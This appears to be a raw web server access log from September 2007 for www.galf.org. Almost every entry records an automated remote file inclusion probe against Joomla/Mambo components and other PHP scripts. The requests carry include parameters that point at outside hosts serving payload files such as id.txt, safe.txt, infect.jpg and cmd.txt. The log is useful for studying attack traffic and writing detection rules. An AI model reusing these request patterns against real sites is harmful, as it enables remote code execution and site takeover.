24.132.116.239 - - [23/Sep/2007:19:16:55 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
24.132.116.239 - - [23/Sep/2007:19:16:56 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
24.132.116.239 - - [23/Sep/2007:19:16:56 -0700] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.19.98.206 - - [23/Sep/2007:19:17:07 -0700] "GET /logs/access_070903.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
202.144.158.163 - - [23/Sep/2007:19:17:23 -0700] "GET /logs/access.log/home.parserss.php?path[docroot]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:18:01 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:18:01 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:18:02 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:18:02 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:18:02 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
195.37.203.229 - - [23/Sep/2007:19:18:03 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
202.144.158.163 - - [23/Sep/2007:19:18:20 -0700] "GET /logs/access.log/home.tell.php?path[docroot]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.144.158.163 - - [23/Sep/2007:19:18:25 -0700] "GET /logs/access.log/home.announce.php?path[docroot]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:21:05 -0700] "GET /logs/access_070827.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:21:06 -0700] "GET /logs/access_070827.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:19:21:28 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:19:21:33 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:19:21:35 -0700] "GET /logs/access_070910.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:22:03 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:22:03 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:22:03 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:22:06 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:22:06 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
195.37.203.229 - - [23/Sep/2007:19:22:06 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
75.126.142.154 - - [23/Sep/2007:19:22:14 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.dimes-unige.net/ini?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.217.130 - - [23/Sep/2007:19:23:14 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.217.130 - - [23/Sep/2007:19:23:15 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
24.132.116.239 - - [23/Sep/2007:19:23:18 -0700] "GET /logs/access_070826.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:19:23:27 -0700] "GET /logs/access_070618.log/modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:19:23:32 -0700] "GET /modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:19:23:38 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
68.180.250.101 - - [23/Sep/2007:19:24:37 -0700] "GET /logs/access_070910.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:25:05 -0700] "GET /logs/access_070826.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:25:45 -0700] "GET /logs/access_070826.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:26:07 -0700] "GET /logs/access_070827.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:26:07 -0700] "GET /logs/access_070827.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:19:27:10 -0700] "GET /logs/access_070827.log/modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.106.13.89 - - [23/Sep/2007:19:27:14 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
59.106.13.89 - - [23/Sep/2007:19:27:14 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.115.203.154 - - [23/Sep/2007:19:27:23 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
217.115.203.154 - - [23/Sep/2007:19:27:23 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.115.203.154 - - [23/Sep/2007:19:27:23 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.115.203.154 - - [23/Sep/2007:19:27:24 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.115.203.154 - - [23/Sep/2007:19:27:24 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.115.203.154 - - [23/Sep/2007:19:27:24 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.115.203.154 - - [23/Sep/2007:19:27:27 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.115.203.154 - - [23/Sep/2007:19:27:28 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:27:31 -0700] "GET /logs/access_070826.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:19:27:40 -0700] "GET /logs/index.php3?id=http://www.schlagerdouble.de/bilder/DSCF0075.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:19:27:40 -0700] "GET /logs/index.php3?id=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:19:27:41 -0700] "GET /index.php3?id=http://www.schlagerdouble.de/bilder/DSCF0075.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
81.169.134.61 - - [23/Sep/2007:19:27:41 -0700] "GET /index.php3?id=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:27:43 -0700] "GET /logs/access_070826.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
66.246.246.94 - - [23/Sep/2007:19:28:30 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.246.246.94 - - [23/Sep/2007:19:28:30 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.234.18.101 - - [23/Sep/2007:19:29:01 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.polisys.com.mx/d3/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.234.18.101 - - [23/Sep/2007:19:29:01 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.polisys.com.mx/d3/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.172.140.27 - - [23/Sep/2007:19:29:20 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
83.172.140.27 - - [23/Sep/2007:19:29:20 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
83.172.140.27 - - [23/Sep/2007:19:29:21 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
83.172.140.27 - - [23/Sep/2007:19:29:21 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.154.215.8 - - [23/Sep/2007:19:29:46 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.154.215.8 - - [23/Sep/2007:19:29:46 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.86.73.154 - - [23/Sep/2007:19:29:51 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.86.73.154 - - [23/Sep/2007:19:29:51 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
74.86.73.154 - - [23/Sep/2007:19:29:54 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.86.73.154 - - [23/Sep/2007:19:29:54 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
91.142.213.13 - - [23/Sep/2007:19:30:03 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
91.142.213.13 - - [23/Sep/2007:19:30:03 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.71.17.106 - - [23/Sep/2007:19:30:28 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.71.17.106 - - [23/Sep/2007:19:30:29 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
195.37.203.229 - - [23/Sep/2007:19:30:38 -0700] "GET /logs/access_070618.log/modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:30:38 -0700] "GET /logs/access_070618.log/modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:30:38 -0700] "GET /modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
195.37.203.229 - - [23/Sep/2007:19:30:38 -0700] "GET /modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:30:39 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:30:39 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:19:30:58 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.schlagerdouble.de/bilder/DSCF0075.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:19:30:58 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
81.169.134.61 - - [23/Sep/2007:19:30:58 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.schlagerdouble.de/bilder/DSCF0075.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:19:30:59 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:19:31:12 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:19:31:12 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.61.161.25 - - [23/Sep/2007:19:31:59 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.61.161.25 - - [23/Sep/2007:19:32:00 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.230.196.5 - - [23/Sep/2007:19:32:56 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.230.196.5 - - [23/Sep/2007:19:32:56 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:33:07 -0700] "GET /logs/access_070827.log/modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:19:33:08 -0700] "GET /logs/access_070827.log/modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
85.52.160.217 - - [23/Sep/2007:19:33:14 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://sweetangel78.altervista.org/djfelix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.52.160.217 - - [23/Sep/2007:19:33:15 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://sweetangel78.altervista.org/djfelix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.136.24.209 - - [23/Sep/2007:19:35:34 -0700] "GET /logs/index2.php?=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
67.136.24.209 - - [23/Sep/2007:19:35:35 -0700] "GET /index2.php?=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
74.52.217.130 - - [23/Sep/2007:19:36:08 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.217.130 - - [23/Sep/2007:19:36:08 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.246.114.18 - - [23/Sep/2007:19:36:35 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.freewebs.com/halajaeira/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.246.114.18 - - [23/Sep/2007:19:36:36 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.freewebs.com/halajaeira/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
59.106.13.89 - - [23/Sep/2007:19:37:27 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
59.106.13.89 - - [23/Sep/2007:19:37:27 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:19:38:38 -0700] "GET /logs/access_070827.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:19:38:43 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:19:38:49 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:19:38:50 -0700] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.254.255.17 - - [23/Sep/2007:19:38:55 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.254.255.17 - - [23/Sep/2007:19:38:56 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:19:39:06 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:19:39:06 -0700] "GET //skin/zero_vote/error.php?dir=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:19:39:11 -0700] "GET /logs/access_070826.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:19:39:16 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.schlagerdouble.de/bilder/DSCF0075.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
81.169.134.61 - - [23/Sep/2007:19:39:16 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:19:39:17 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.schlagerdouble.de/bilder/DSCF0075.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:19:39:17 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:19:39:17 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.schlagerdouble.de/bilder/DSCF0075.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:19:39:18 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:19:39:27 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.schlagerdouble.de/bilder/DSCF0075.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:19:39:27 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
81.169.134.61 - - [23/Sep/2007:19:39:27 -0700] "GET //skin/zero_vote/error.php?dir=http://www.schlagerdouble.de/bilder/DSCF0075.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:19:39:28 -0700] "GET //skin/zero_vote/error.php?dir=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.68.207 - - [23/Sep/2007:19:40:15 -0700] "GET /logs/access_070827.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.68.207 - - [23/Sep/2007:19:40:15 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
